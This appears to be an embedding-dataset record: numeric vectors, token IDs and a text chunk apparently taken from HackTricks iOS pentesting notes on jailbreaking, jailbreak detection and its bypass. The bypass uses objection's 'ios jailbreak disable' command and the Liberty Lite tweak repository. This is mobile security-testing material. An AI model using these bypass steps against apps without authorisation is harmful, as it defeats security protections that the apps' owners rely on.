-0.13158565759658813, 0.7052252888679504, 0.4744654893875122, 0.16815944015979767, -0.20411375164985657, -0.6067380905151367, -0.13868238031864166, -0.9628709554672241, -0.19538287818431854, 0.25431540608406067, 0.13752327859401703, -0.11817839741706848, -0.07608740776777267, 0.48710909485816956, -0.07775352895259857, 0.2576385736465454, 0.4349633753299713, 0.45506325364112854, -0.4410814940929413, 0.005051570478826761, 0.9195934534072876, -0.7975982427597046, -0.6371126770973206, -0.31240883469581604, 0.7071377038955688, -0.507969856262207, -0.7156584858894348, -0.11933426558971405, 0.8681215047836304, -0.18517521023750305, -0.42976582050323486, -0.3530951738357544, -0.3648394048213959, 0.4372042715549469, 0.15666697919368744, 0.321795254945755, -0.2064117044210434, -0.2963314950466156, 0.5269643068313599, -0.37769848108291626, -0.2144237607717514, 0.15167079865932465, -0.4002890884876251, 0.6409050226211548, 0.4337483048439026, 0.023525696247816086, 0.6983177661895752, 0.3071577250957489, -0.14291025698184967, 0.672856867313385, 0.9064550995826721, 0.42940136790275574, -0.06353853642940521, 0.256438285112381, -0.6256221532821655, 0.8695053458213806, 0.00010566349374130368, 0.37293046712875366, 0.1272202879190445, -0.1272089183330536, 0.15778778493404388, -0.6716422438621521, 0.7250319719314575, 0.23672711849212646, 0.3590940535068512, -0.5653815865516663, 0.19649340212345123, -0.4942864179611206, -0.16432662308216095, 0.12713289260864258, -0.27241072058677673, -0.08199459314346313, 0.15182045102119446, -0.12485621124505997, -0.23155565559864044, 0.20959040522575378, 0.779705286026001, -0.7682542204856873, 0.34625035524368286, -0.3281070291996002, 0.07351679354906082, -0.05481412261724472, 0.0641578882932663, -0.735964298248291, 0.42007389664649963, 1.0781439542770386, 0.18762917816638947, -0.1779407411813736, 0.4092472791671753, 0.15193963050842285, -0.24607613682746887, 0.5509205460548401, 0.007422083523124456, -0.3171887993812561, 0.20177246630191803, -0.03502125293016434, -1.1335514783859253, -0.5231674909591675, -0.1612655222415924, 0.14872051775455475, -0.7341392636299133, 0.6315855383872986, -0.12720905244350433, 0.3155770003795624, -0.35519272089004517, 0.4247969090938568, -0.28974393010139465, 0.23187367618083954, 0.18446440994739532, -0.6019780039787292, -0.7154268622398376, 1.0008198022842407, -0.17888972163200378, 1.077614188194275, -0.5107110738754272, 0.48152413964271545, -0.266534686088562, 0.5265164375305176, -0.39500436186790466, -0.40707725286483765, -0.2526533603668213, -0.31047236919403076, -0.4353436827659607, -0.7127828001976013, 0.2354561686515808, -0.7681326270103455, 0.8864331841468811, 0.4197041392326355, -0.23448602855205536, 0.019483093172311783, 0.22125084698200226, -0.3193190097808838, -0.7972688674926758, 0.26908326148986816, -0.09077273309230804, -0.5186550617218018, 0.5797748565673828, -0.365631103515625, -0.014052520506083965, 0.4299614131450653, -0.01284755114465952, -0.4962812662124634, -0.08751259744167328, -0.3831900358200073, 0.027936158701777458, 1.2735531330108643, -0.1397855579853058, -0.5930904150009155, 0.28347650170326233, -1.0052727460861206, -0.6610158085823059, -0.07395574450492859, -0.3158208429813385, 0.17045751214027405, 0.5378585457801819, 0.27021142840385437, 0.709843635559082, 0.34998899698257446, -0.1777014136314392, -0.41010087728500366, 0.6785814166069031, 0.8390230536460876, -0.4032730460166931, 0.5959028601646423, 0.42390143871307373, -0.5068749189376831, -0.09181801974773407, -0.5542250871658325, 1.012671947479248, -0.3798829913139343, -0.4608001410961151, -0.27693161368370056, -0.16042044758796692, -1.0340427160263062, -0.49092575907707214, 0.3564642667770386, 0.17771346867084503, -0.34898990392684937, 0.3838396966457367, -1.1948539018630981, 0.25566962361335754, -0.824367105960846, -0.03853579983115196, -0.0734354704618454, 0.00039641428156755865, 0.11136224865913391, 0.45051512122154236, 0.5527047514915466, -1.2021355628967285, 4.318114280700684, 0.9253087043762207, 0.30052849650382996, 0.44266027212142944, 0.2695283591747284, 0.7613229751586914, 0.9445267915725708, -0.3140244483947754, 0.3170536458492279, -0.743072509765625, 0.21173050999641418, -0.310634583234787, 0.5469118356704712, 0.14399513602256775, 0.2980071008205414, 0.3162386417388916, -0.12365235388278961, 0.8759150505065918, 0.4524036645889282, -1.1351081132888794, -1.17853581905365, 0.04335722327232361, -0.374944806098938, 0.7677525877952576, 0.3412366509437561, 0.4723657965660095, 0.5745099186897278, 0.2082434743642807, 0.18775540590286255, 0.3372427523136139, -0.09380510449409485, -0.22911840677261353, 0.12970711290836334, -0.27067339420318604, -0.6417554616928101, 0.30449575185775757, 0.6569070816040039, -0.6537331938743591, -0.4458646774291992, 0.15745675563812256, 0.1016288548707962, 0.04188782349228859, 0.3956686854362488, 0.0907115638256073, -0.4877135455608368, 0.8348248600959778, -0.14451849460601807, -0.17624372243881226, 0.8622750639915466, -0.4897698760032654, 0.9279676079750061, -0.24618875980377197, 0.7166160345077515, -0.6281866431236267, -0.21827912330627441, 0.34049150347709656, -0.40965932607650757, -0.6144174933433533, 0.2366953343153, -0.8310978412628174, 0.8437064290046692, -0.6907162070274353, 0.07443532347679138, -0.49694153666496277, -0.6637816429138184, 0.49668166041374207, -0.5142800211906433, 0.8506063222885132, 0.2621892988681793, -0.3575563430786133, -0.44398924708366394, -0.2777459919452667, -0.8898977041244507, -0.3873324394226074, 0.9507790207862854, -0.3611040711402893, -0.0025116854812949896, 0.5934760570526123, 0.16981156170368195, -0.3670336902141571, -0.680459201335907, -0.9974552989006042, -0.6110696792602539, 0.14262215793132782, 0.6442154049873352, 0.6899040341377258, 0.0604107566177845, -1.0816856622695923, 0.7330765724182129, 0.40298423171043396, 0.6645942330360413, 0.31768885254859924, 0.20565491914749146, 0.7473567128181458, -0.09114430844783783 ]
[ 1998, 8816, 27178, 2050, 3813, 8059, 2013, 1996, 12997, 26760, 22956, 4037, 1012, 2039, 16616, 1996, 9808, 20362, 1996, 3466, 1997, 7173, 23890, 2075, 1012, 7173, 23890, 4127, 22513, 27190, 7173, 23890, 2015, 2123, 1005, 1056, 29486, 2083, 2128, 27927, 2015, 1010, 2061, 2128, 1011, 11243, 7173, 23890, 2015, 5942, 1996, 5080, 2000, 2022, 4198, 1006, 8915, 12399, 2098, 1007, 2000, 1037, 3274, 2076, 2296, 2128, 27927, 1012, 1996, 5080, 2089, 2025, 2128, 27927, 2012, 2035, 2065, 1996, 3274, 2003, 2025, 4198, 1012, 4100, 1011, 8915, 12399, 2098, 7173, 23890, 2015, 2064, 1005, 1056, 2022, 2128, 1011, 4162, 4983, 1996, 5080, 2003, 4198, 2000, 1037, 3274, 2076, 2128, 27927, 1012, 1996, 5080, 2064, 2036, 9573, 2046, 2512, 1011, 7173, 29162, 5549, 2006, 2049, 2219, 1012, 4100, 1011, 4895, 22513, 27190, 7173, 23890, 2015, 3499, 1996, 5080, 2000, 9573, 2006, 2049, 2219, 1010, 2021, 1996, 16293, 13864, 1006, 2030, 5310, 1011, 2455, 12719, 1007, 2005, 4487, 3736, 9709, 3642, 6608, 4995, 1005, 1056, 4162, 8073, 1012, 1996, 5310, 2442, 2128, 1011, 7173, 23890, 1996, 5080, 2011, 3225, 2019, 10439, 2030, 5873, 1037, 4037, 1006, 2025, 9034, 1037, 4434, 2000, 1037, 3274, 1010, 6516, 1996, 2744, 4895, 22513, 27190, 1007, 1012, 4895, 22513, 27190, 7173, 23890, 2015, 2024, 1996, 2087, 2759, 3601, 2005, 2203, 5198, 2138, 2027, 2342, 2000, 2022, 4162, 2069, 2320, 1010, 2044, 2029, 1996, 5080, 2097, 2022, 8642, 7173, 29162, 1012, 7173, 23890, 2075, 5906, 4305, 12494, 4765, 16380, 4617, 5478, 2367, 7173, 23890, 2075, 5461, 1012, 5646, 3251, 1037, 2270, 7173, 23890, 2003, 2800, 2005, 2115, 2544, 1997, 16380, 1012, 2022, 8059, 1997, 8275, 5906, 1998, 8645, 8059, 1010, 2029, 2024, 2411, 6318, 2369, 5884, 3415, 2008, 2024, 2714, 2000, 1996, 2171, 1997, 1996, 7173, 23890, 2075, 2177, 1013, 3166, 1012, 2544, 4973, 1024, 4638, 2527, 2487, 2078, 1024, 2573, 2006, 5733, 2383, 1996, 1037, 2581, 9090, 1998, 2004, 2047, 2004, 1996, 17350, 2487, 9090, 1010, 1041, 1012, 1043, 1012, 18059, 1019, 2015, 2039, 2000, 18059, 1060, 1012, 24489, 27717, 2078, 1024, 4638, 2213, 2620, 5733, 1006, 1037, 2620, 1011, 17350, 2487, 1007, 2006, 16380, 2321, 1012, 1014, 1011, 2385, 1012, 1019, 1012, 4895, 2278, 2692, 6299, 1024, 2069, 2573, 2069, 2005, 16380, 4617, 2039, 2000, 2403, 1012, 1022, 1010, 2144, 6207, 8983, 2098, 1996, 3314, 2008, 3039, 4895, 2278, 2692, 6299, 2000, 2448, 10760, 16380, 7173, 23890, 3496, 19852, 2015, 2061, 5901, 2008, 4346, 2039, 1011, 2000, 1011, 3058, 8128, 2003, 3697, 1012, 2174, 1010, 2057, 2064, 2391, 2017, 2000, 2070, 4216, 2008, 2024, 2747, 10539, 1024, 2064, 1045, 7173, 23890, 1029, 1996, 18059, 15536, 23630, 2098, 11442, 10356, 22367, 4183, 7173, 23890, 11039, 25856, 2015, 1024, 1013, 1013, 4638, 2527, 1012, 1999, 1013, 3602, 2008, 2151, 14080, 2017, 2191, 2000, 2115, 5080, 2003, 2012, 2115, 2219, 3891, 1012, 2096, 7173, 23890, 2075, 2003, 4050, 3647, 1010, 2477, 2064, 2175, 3308, 1998, 2017, 2089, 2203, 2039, 5318, 2075, 2115, 5080, 1012, 2053, 2060, 2283, 3272, 4426, 2064, 2022, 2218, 26771, 2005, 2151, 4053, 1012, 6666, 10760, 2087, 2590, 2217, 3466, 1997, 7173, 23890, 2075, 2003, 2008, 2009, 20362, 2151 ]
hack_tricks
431.txt
3
sandboxing put in place by the os. therefore, any app on the device can read any file on the filesystem, including other apps files, cookies and keychain. a jailbroken device allows users to install unapproved apps and leverage more apis, which otherwise aren't accessible. it's not recommended to jailbreak the mobile for regular usersafter jailbreakingios basic testing operationsjailbreak detectionseveral applications will try to detect if the mobile is jailbroken and in that case the application won't runafter jailbreaking an ios files and folders are usually installed, these can be searched to determine if the device is jailbroken. in a jailbroken device applications get read / write access to new files outside the sandboxsome api calls will behave differentlythe presence of the openssh servicecalling / bin / sh will return 1 instead of 0more information about how to detect jailbreaking here. you can try to avoid this detections using objection's ios jailbreak disablejailbreak detection bypassyou can try to avoid this detections using objection's ios jailbreak disableyou could also install the tool liberty lite ( https : / / ryleyangus. com / repo / ). once the repo is added, the app should appear in the ‘ search ’ tab [SEP]
[ 0.0025850413367152214, 0.42260462045669556, -0.018281230702996254, 0.16232231259346008, 0.028641097247600555, -0.3421524465084076, -0.05300821363925934, 0.129140242934227, 0.39345547556877136, 1.4997841119766235, 0.11543934792280197, 0.653334379196167, 0.7433415055274963, -0.0872792974114418, -0.8726182579994202, -0.28484785556793213, -0.46911054849624634, 0.6325569152832031, -0.02182263880968094, 0.37366461753845215, 0.35826224088668823, 0.7141866087913513, -0.6747520565986633, -0.18139369785785675, -0.3953293561935425, -0.08690430223941803, 0.17808222770690918, 0.43919819593429565, 0.9440142512321472, 1.1224594116210938, -0.24059364199638367, 1.2242136001586914, 0.9793541431427002, -0.6101880073547363, -0.05227794498205185, -0.4151381850242615, 0.7927651405334473, -0.1303596943616867, -0.10735587775707245, -0.9035079479217529, 0.03057512268424034, 0.6243062615394592, 0.7905254364013672, -0.38242560625076294, -0.9398274421691895, -0.596215009689331, -0.5681440234184265, -0.22888195514678955, -0.6078895330429077, 0.3991917371749878, -0.03154018148779869, 0.5303381085395813, -0.35193294286727905, -0.3595186173915863, 0.13119341433048248, 0.28553351759910583, 0.08541033416986465, -0.3145199418067932, -0.17480716109275818, 0.5338150262832642, 0.22310799360275269, 0.18501004576683044, 0.2966926395893097, 0.0770179033279419, 0.33536311984062195, 0.891718864440918, -1.1882824897766113, -0.3198629319667816, 0.046060770750045776, -0.48498350381851196, 0.36568838357925415, 0.2815549969673157, -0.4761095643043518, -0.72523432970047, 0.08384013175964355, 0.0064229038543999195, -0.21249492466449738, 0.4380436837673187, 0.15419140458106995, 1.5121303796768188, -0.14212065935134888, 1.2576489448547363, 0.038459084928035736, -0.45292845368385315, -0.6021360158920288, 0.11558368057012558, 0.1158168613910675, -1.4512603282928467, 0.06987334787845612, -0.5461543202400208, -0.4713267982006073, 0.47397416830062866, -1.0928056240081787, -0.13725216686725616, 0.2559630572795868, 0.7838138937950134, -0.47887372970581055, 0.1453414112329483, 0.19779494404792786, -0.12578284740447998, -0.060887519270181656, 0.2839106023311615, 0.16446556150913239, 0.5086687803268433, -0.4111160337924957, 0.3011358678340912, 0.7978491187095642, 0.11391539871692657, -1.1855740547180176, -0.5789639949798584, -0.042892441153526306, -0.02885846234858036, -0.15854701399803162, 0.021815843880176544, -0.3578881025314331, -0.06986747682094574, 0.8462396860122681, 0.21864718198776245, 0.08121602237224579, 0.06309253722429276, 0.41324976086616516, 0.21709203720092773, 0.6630681753158569, -0.6343590617179871, -0.08479424566030502, 0.8238582611083984, -0.31042221188545227, 0.1696493923664093, -0.0914900004863739, -0.5550559759140015, -0.005028208717703819, 0.25855547189712524, 0.4516904652118683, 1.0047576427459717, -0.9152696132659912, -0.08819661289453506, 0.7645459175109863, 0.08845267444849014, 0.26970168948173523, -0.6740050911903381, -0.39036422967910767, -0.1085699200630188, -0.3976738154888153, 0.7216902375221252, -0.4638412594795227, -0.307921826839447, -0.5396878719329834, 0.034942377358675, -0.6730988621711731, -0.30226272344589233, 0.0000798842083895579, 0.1321570724248886, 0.5942661762237549, -0.22890111804008484, -0.31013208627700806, 0.4658324718475342, -0.8378563523292542, 0.8721673488616943, 0.44617822766304016, 0.16623114049434662, -0.8477494716644287, 0.12354204058647156, -0.45321545004844666, 0.30523988604545593, -0.28145235776901245, -0.24489936232566833, -0.0707804262638092, -0.15416871011257172, 0.44238144159317017, 0.04946858063340187, 0.39517471194267273, 0.6247069239616394, -0.6547068357467651, 0.5850574970245361, 0.3708409368991852, -0.3779759109020233, 0.20026499032974243, 0.1284811943769455, 0.0633387416601181, -0.13750754296779633, 0.05359400436282158, -0.04042362421751022, 0.5019602179527283, 0.9614983797073364, -0.5896963477134705, 0.23446235060691833, -0.19240635633468628, -0.48447385430336, -0.763462483882904, -0.15159423649311066, -0.01453328412026167, 0.7292430996894836, -0.8449370265007019, -0.09599077701568604, -0.37998250126838684, -0.10814300924539566, -1.3333055973052979, -0.6621484756469727, -0.02656169980764389, -0.9844000339508057, -0.2804584503173828, 0.678532063961029, -0.1693570464849472, 0.282606840133667, -0.34882086515426636, -0.15230238437652588, 0.6570150852203369, 0.822998046875, -0.514164388179779, -0.13393282890319824, 0.05739500746130943, 0.31409743428230286, -0.6951743364334106, -0.12461142241954803, 0.1703246384859085, -0.18838943541049957, 0.5245664119720459, 0.20638152956962585, -0.1533070206642151, 0.21572302281856537, -0.03605365753173828, 0.5662844181060791, 0.7569104433059692, 0.6711803078651428, -0.38491883873939514, 0.3340955674648285, 0.24983325600624084, -0.0761236697435379, 0.09402094781398773, -0.33060431480407715, -0.10098028182983398, 0.5615100860595703, -0.09015408158302307, 0.9206727743148804, -0.21348454058170319, -0.012757818214595318, 0.4599749445915222, 0.13779078423976898, -0.38195347785949707, 0.831845760345459, -0.17520128190517426, 0.8196132779121399, -0.035757582634687424, 0.10457485914230347, -0.10057533532381058, -0.5711171627044678, -0.19683565199375153, 0.41448158025741577, 0.22946684062480927, 0.5917036533355713, -0.6000497341156006, 0.3488312065601349, 1.0467370748519897, 0.4201710522174835, -0.47488275170326233, -0.3353089392185211, -0.445482075214386, 0.5826218128204346, -0.9797425270080566, -0.2524081766605377, 0.7676945328712463, 0.3929998278617859, -0.0051552425138652325, -0.008685313165187836, 0.33925798535346985, 0.6806635856628418, 0.7564983367919922, 0.21147219836711884, -0.2848373055458069, -0.7061408758163452, -0.45557069778442383, 0.08926142752170563, -0.5551337599754333, 0.07727431505918503, -0.7082841396331787, 0.8970299959182739, 0.3194064199924469, -1.1594607830047607, 0.47045499086380005, -0.7224610447883606, -0.14215750992298126, 0.31253576278686523, 0.9159334897994995, 0.09399449080228806, -0.6343480348587036, 0.2865794599056244, -0.489923894405365, -0.05412862449884415, -0.4735203981399536, -0.6044422388076782, -0.3970463275909424, -0.03800002858042717, -0.29128989577293396, -0.29773250222206116, 0.7736177444458008, -0.3575037717819214, 0.16986341774463654, 0.93254154920578, -0.36141642928123474, 0.45954829454421997, -0.4072819650173187, -0.0833575502038002, 0.1466885209083557, -0.07969103008508682, -0.8142737746238708, 0.4003053307533264, 0.8739501237869263, -0.11074481159448624, 0.5552859902381897, 0.6464831829071045, -0.6418464779853821, -0.308851420879364, -0.1267998218536377, 0.030751565471291542, -0.5566167235374451, 0.37705719470977783, 1.0196917057037354, -0.28757229447364807, -0.2610623836517334, 0.1665516495704651, -0.1808919757604599, -0.7698081731796265, -0.5704120397567749, -0.5660938620567322, -0.3127584755420685, 0.4793587625026703, -0.664155900478363, -1.241897702217102, 0.31254827976226807, -0.35238945484161377, 0.3539872169494629, 0.28377145528793335, -0.31394192576408386, 1.250916838645935, 0.24612855911254883, 0.3239326775074005, -0.10809633880853653, -0.014735940843820572, -0.38512951135635376, 1.081291913986206, -0.3157200813293457, -0.061587750911712646, 0.46235543489456177, -0.8903778195381165, -0.08225279301404953, -0.3607790768146515, 0.3626113533973694, 0.0801423043012619, 0.3039674162864685, -0.1797274798154831, -0.1055852398276329, 0.10725177824497223, -0.5234168767929077, -0.2644820809364319, 0.6241299510002136, 0.47977036237716675, -1.1246490478515625, 0.2174789309501648, 0.29403620958328247, -0.1313832849264145, 0.2616635262966156, 0.2254251092672348, 0.4947602450847626, 0.5382711291313171, 0.2136005461215973, -0.7796629071235657, -0.525924801826477, 0.32530346512794495, -0.17240729928016663, -0.07906131446361542, 0.903078019618988, -0.4362618029117584, 0.08346886187791824, 0.7556785941123962, -0.26832786202430725, -0.34550991654396057, 0.5890859365463257, 0.3214769959449768, 1.163869857788086, -0.8006934523582458, 0.26775434613227844, -0.1999976933002472, 0.4142874479293823, 0.13903674483299255, 0.1634419858455658, 0.04024035483598709, -0.3978383243083954, -0.167083278298378, -0.6671655178070068, 0.1470588743686676, -0.05394136905670166, 0.09064938127994537, 0.318166583776474, -0.05407379940152168, -0.9638907313346863, -0.5898680686950684, 0.40219539403915405, 0.6463662385940552, 0.9010393619537354, -0.09917472302913666, 0.4921702742576599, 0.10078638046979904, 0.09001486748456955, -0.13508306443691254, -0.7544922828674316, -0.15720053017139435, -0.3910924792289734, 0.463444322347641, -0.9600069522857666, -0.14925451576709747, -0.7492090463638306, -0.18362057209014893, -0.08486641943454742, 0.5491982698440552, -0.5511072278022766, 0.08382540941238403, -0.6564880609512329, 0.012373104691505432, -0.3210776448249817, 0.03263015300035477, -0.8131083846092224, 0.03923143073916435, -0.5584895014762878, -0.019040031358599663, 0.8780385851860046, -0.12558473646640778, 0.2671595811843872, -0.1317843645811081, 0.10840840637683868, -0.07400093972682953, -0.3869132399559021, -0.4960923492908478, -0.3961375951766968, -0.9609532952308655, -0.7090694308280945, 0.40056753158569336, 0.6445378661155701, 0.8864811658859253, 0.40351155400276184, -0.5537667274475098, -0.20638537406921387, 0.6188891530036926, -0.3165281116962433, 0.09515377134084702, -0.11436957865953445, 0.26804083585739136, 1.0511120557785034, 0.46646934747695923, 0.08292863517999649, 0.3453225791454315, 0.6731368899345398, -0.989005446434021, 0.5646479725837708, -0.6045199036598206, -0.49841368198394775, -0.30373942852020264, 0.7462126612663269, -0.28139591217041016, 0.01590772345662117, -0.4879870116710663, -0.056277643889188766, 0.1320318877696991, 0.27671706676483154, -0.7100196480751038, -0.17258794605731964, 0.20269902050495148, -0.8167831897735596, -0.816284716129303, -0.12415268272161484, -0.05543907359242439, -0.08370039612054825, 0.20965175330638885, -0.1148558184504509, -0.6005616784095764, 0.705530047416687, -0.46682867407798767, 0.44456857442855835, 0.2433469593524933, -0.39621418714523315, -0.17926537990570068, -0.49746179580688477, 0.6002669930458069, 0.5174121856689453, 0.5132425427436829, -0.2779925465583801, -0.5010553598403931, -0.8583535552024841, 0.07147707045078278, 0.44945842027664185, 1.2601308822631836, 0.531109094619751, 0.2160431295633316, -0.41302382946014404, -0.3669373691082001, -0.051176074892282486, -0.34722456336021423, -0.7778159976005554, -0.5356407761573792, 0.517405092716217, 0.5275039672851562, 0.019149916246533394, 0.4026001989841461, -0.4519970417022705, 0.009691857732832432, 0.04557044804096222, 0.12647183239459991, -1.0736531019210815, 0.48905688524246216, 0.1843864917755127, 0.08965729922056198, 0.02386447601020336, 1.0586131811141968, 0.5494959950447083, 0.2342280000448227, 1.0337120294570923, -0.21008946001529694, 0.07008577138185501, -0.29016807675361633, -0.4217047691345215, 0.39152947068214417, 0.7110769748687744, -0.32835841178894043, -1.2940387725830078, -0.05609491094946861, -0.32142555713653564, -0.12045314162969589, -0.2785104513168335, -0.9597443342208862, -0.08500145375728607, -0.35554400086402893, 0.22455699741840363, -0.6781109571456909, -0.01894392818212509, -0.22011831402778625, -0.3004772663116455, -0.9790204167366028, 1.0370169878005981, -0.14809191226959229, -0.43077152967453003, -0.007090670522302389, -0.12086891382932663, -0.01529863104224205, -0.6317008137702942, -0.6819051504135132, -0.32798296213150024, -0.24335087835788727, -0.08700689673423767, 0.7350438833236694, -0.08527281880378723, -0.3396374583244324, -0.12849174439907074, 0.16246090829372406, -0.2565636932849884, 0.20900318026542664, -0.39294180274009705, -0.3976347744464874, -0.30205482244491577, -0.06257976591587067, -0.3116845488548279, 0.5676517486572266, -1.2214082479476929, 0.3184247314929962, -0.43134331703186035, 0.13629306852817535, -0.27297642827033997, -0.20110230147838593, -0.012357966043055058, 0.4047233462333679, 0.5846369862556458, -0.23778846859931946, 0.16233128309249878, -0.5088997483253479, 0.2873174846172333, 0.2226124405860901, 0.24857915937900543, -0.8270862698554993, 0.6264046430587769, -0.3777303993701935, -0.46028852462768555, -0.3315926194190979, -0.5279836058616638, -0.38807639479637146, -0.4161592125892639, -0.19353452324867249, 0.4342256486415863, -0.7428792715072632, -0.40364399552345276, 0.8853536248207092, -0.07030438631772995, -0.21112488210201263, -0.5949044227600098, 0.8049173355102539, 0.3812446594238281, -0.6041409969329834, -0.7122941017150879, 0.47056102752685547, -0.003059889655560255, -0.5214898586273193, 0.060368604958057404, -0.571446418762207, -0.5273891687393188, 0.4021356701850891, 1.0662277936935425, 0.37402909994125366, -0.015220808796584606, 0.25961869955062866, -0.04668034240603447, 0.11732006072998047, 0.2808440625667572, 0.28412508964538574, 0.692101240158081, 0.523004412651062, 0.23844073712825775, -0.5103128552436829, 0.24199935793876648, -0.34790822863578796, -0.023166174069046974, -0.03859927877783775, 0.44851911067962646, 0.008597331121563911, -0.6458976864814758, 0.8124311566352844, -0.07092569768428802, -0.6540598273277283, -0.43975958228111267, 0.0772271379828453, -0.05106876790523529, 0.2325950264930725, 0.12928831577301025, -0.40275245904922485, -0.3211148977279663, -0.038582995533943176, 0.05733472853899002, -0.22569072246551514, 0.2584053874015808, 0.13034848868846893, -0.49749672412872314, 0.26786839962005615, -0.11915148794651031, -0.2828561067581177, 0.5111066102981567, -0.4203239381313324, -0.8602151274681091, -0.9408406019210815, 0.3495858907699585, -0.20754213631153107, -0.3487710654735565, 0.7036670446395874, 0.303378164768219, 0.13264109194278717, 0.19586196541786194, 0.0806666910648346, 0.3412497043609619, 0.13849902153015137, 1.0199546813964844, 0.2926566004753113, -0.748932957649231, -1.279491662979126, 0.007686079945415258, -0.5062910914421082, -0.355444073677063, -0.3010319173336029, -0.5506300926208496, 1.1025217771530151, 0.01039297878742218, 0.8693794012069702, -0.3366668224334717, -0.29529470205307007, -0.3071233928203583, 0.21758036315441132, 0.6726803779602051, -0.44226309657096863, -0.231070414185524, 0.21736113727092743, 0.06201537698507309, 0.022482767701148987, -0.31895819306373596, -0.2562142014503479, 0.31149542331695557, -0.8768368363380432, -0.07105405628681183, -1.0835360288619995, 0.3916057050228119, -0.17326907813549042, -0.6783367991447449, -0.3807532787322998, -0.37466007471084595, 0.10165790468454361, -0.27130094170570374, -0.0202577393501997, -0.27677854895591736, -0.8543351888656616, 0.5016674399375916, -0.3183218836784363, 0.10933864116668701, 0.04837941378355026, -0.38431358337402344, 0.3683253228664398, 0.4708998501300812, -0.17052283883094788, 0.27146998047828674, 0.1466856300830841, -0.09794369339942932, 0.06739550828933716, -0.24124564230442047, 0.08418607711791992, 0.36419031023979187, 0.10565632581710815, 0.3175463080406189, 0.17703241109848022, 0.409347265958786, 0.5653916597366333, -0.02383873052895069, -0.4982790946960449, 0.08055302500724792, -0.7585098743438721, 0.06813294440507889, 0.4912872016429901, 0.22043490409851074, -0.9033495187759399, 0.6796825528144836, -0.3553104102611542, 0.23811551928520203, 0.016070466488599777, 0.422779381275177, 0.3835217356681824, 0.5369882583618164, 0.757548451423645, 0.25356656312942505, -0.2469066083431244, 0.0928100049495697, -0.22904951870441437, 0.0025781348813325167, 0.391817182302475, -0.20859068632125854, -0.6607345938682556, -0.0060660564340651035, -0.2889348268508911, 0.12767080962657928, -0.09369589388370514, -0.7961938977241516, 0.41093456745147705, 0.8175104260444641, -0.09841758012771606, 0.018478816375136375, -0.5823884010314941, 0.12486705929040909, -0.6197125911712646, -0.3886290192604065, 0.4575713276863098, 0.4129038155078888, -0.282647043466568, -0.7980117797851562, 0.385492205619812, 0.40521982312202454, -0.31363776326179504, 0.0376315675675869, -0.0847976803779602, -0.43796026706695557, 0.13175833225250244, 0.378117173910141, -0.07241012156009674, -0.18709105253219604, -0.3189058303833008, 0.4845457971096039, 0.1046033650636673, -0.35986194014549255, 1.0225677490234375, 1.2283415794372559, -0.43575695157051086, -0.10735777020454407, -0.9816747903823853, -0.6271786689758301, 0.6348277926445007, 0.18937037885189056, 0.16847878694534302, -0.34532707929611206, -0.854451596736908, 0.6899996995925903, -0.5760571956634521, 0.2816835343837738, -0.22756411135196686, -0.33021897077560425, 0.23215293884277344, -0.3736276924610138, -0.37989842891693115, 0.4058782160282135, 0.04562877491116524, 0.06132233515381813, 0.09307694435119629, 0.09084801375865936, 0.5498908758163452, 0.03832418471574783, 0.03381466865539551, 0.5568034648895264, -0.05257643014192581, 0.29368481040000916, 0.21754951775074005, -0.3226884603500366, 0.8722707033157349, 0.7402046322822571, -0.3236771523952484, -0.15548817813396454, -0.33095332980155945, -0.580431342124939, -0.43129733204841614, 0.04004671052098274, -0.26636287569999695, 0.42359358072280884, 0.40477311611175537, -0.5223588347434998, -0.4324626624584198, -0.18130353093147278, 0.24548320472240448, -0.16617335379123688, -0.007320215459913015, 0.9841328263282776, -0.3058052361011505, -0.15812700986862183, 0.09595704078674316, -0.053112003952264786, 0.543855607509613, -0.09017982333898544, -1.1475770473480225, 0.10840509086847305, 0.780724823474884, 1.0224627256393433, -0.3744102120399475, 0.653167724609375, 0.163804292678833, 0.25986742973327637, -0.05439265817403793, 0.7467466592788696, -0.3960143029689789, -0.10235665738582611, 0.3891056478023529, -0.16597753763198853, -0.2451566606760025, 0.03645402193069458, -0.29237374663352966, -0.44805118441581726, 0.04731227830052376, -0.2882753014564514, 0.42945048213005066, -0.8250572085380554, 0.20243631303310394, -0.2268856018781662, -0.30818846821784973, 0.7983986139297485, -0.06228316202759743, -0.5902920365333557, 0.30097755789756775, -0.14758120477199554, -0.2611258327960968, -0.14989618957042694, 0.025858920067548752, 0.4295685291290283, 0.6478267908096313, 0.6145787835121155, -0.2551625072956085, 0.5134958624839783, -0.008783377707004547, -0.5756587386131287, -0.2912883758544922, -0.4228224754333496, -0.6088302135467529, 0.11796257644891739, 0.07688862085342407, -0.7183133363723755, -0.3481205999851227, 0.25456205010414124, -0.007484421133995056, -0.5413443446159363, -0.1014523133635521, -0.03075600601732731, -0.3501400947570801, 0.32326024770736694, 0.1442645788192749, -0.13224413990974426, -0.04940051585435867, -0.5601788759231567, -0.21973711252212524, 0.6570926308631897, -0.16625666618347168, -0.41464534401893616, 0.8816435933113098, -0.6912223100662231, -0.1812133640050888, 0.04327036067843437, -1.0467358827590942, -0.500008225440979, -0.025597674772143364, -0.2363995611667633, 0.38657689094543457, 0.38860559463500977, 0.2546629011631012, 0.8893945813179016, 0.47351720929145813, -0.3857193887233734, 0.6966643929481506, 0.13697633147239685, 0.8736422657966614, -1.1519232988357544, 0.49898552894592285, 0.3304394483566284, -0.3072670102119446, 0.27710482478141785, 0.22440274059772491, 0.09724482893943787, -1.0273923873901367, -0.23031353950500488, 0.021120499819517136, -0.3927377760410309, -0.6105212569236755, -0.0965762734413147, 0.3255796432495117, 0.29237329959869385, -0.8469316959381104, 0.576555609703064, -0.06575148552656174, 0.16660058498382568, -0.8684759736061096, 0.5361444354057312, -0.47096019983291626, -0.41115522384643555, 0.3872416317462921, -0.13911651074886322, -0.25290918350219727, -1.427274227142334, 4.3293890953063965, 1.0730760097503662, 0.09193721413612366, 0.918662428855896, 0.8369864225387573, 0.046841759234666824, -0.027185389772057533, -0.6133723855018616, 0.6172553896903992, -1.1331020593643188, 0.8244122862815857, -1.4519270658493042, 0.569267213344574, -0.1741614192724228, -0.8608604669570923, 0.4400899112224579, 0.19945935904979706, 0.5572065114974976, 0.46291685104370117, -0.08833101391792297, -1.2980347871780396, -0.020610051229596138, 0.0032105750869959593, 1.0530256032943726, -0.17702634632587433, 0.07238715887069702, -0.08624650537967682, 0.047742877155542374, -0.27855369448661804, 0.12344081699848175, 0.4379030168056488, -0.651431143283844, 0.787056565284729, -0.189064621925354, -0.4740248918533325, 0.4285174310207367, 0.862663745880127, 0.21421533823013306, -0.10650438070297241, 0.5726893544197083, -0.5512239336967468, -0.2250390499830246, 0.36165452003479004, -0.16481870412826538, -0.48076823353767395, 1.2690062522888184, 0.319658100605011, 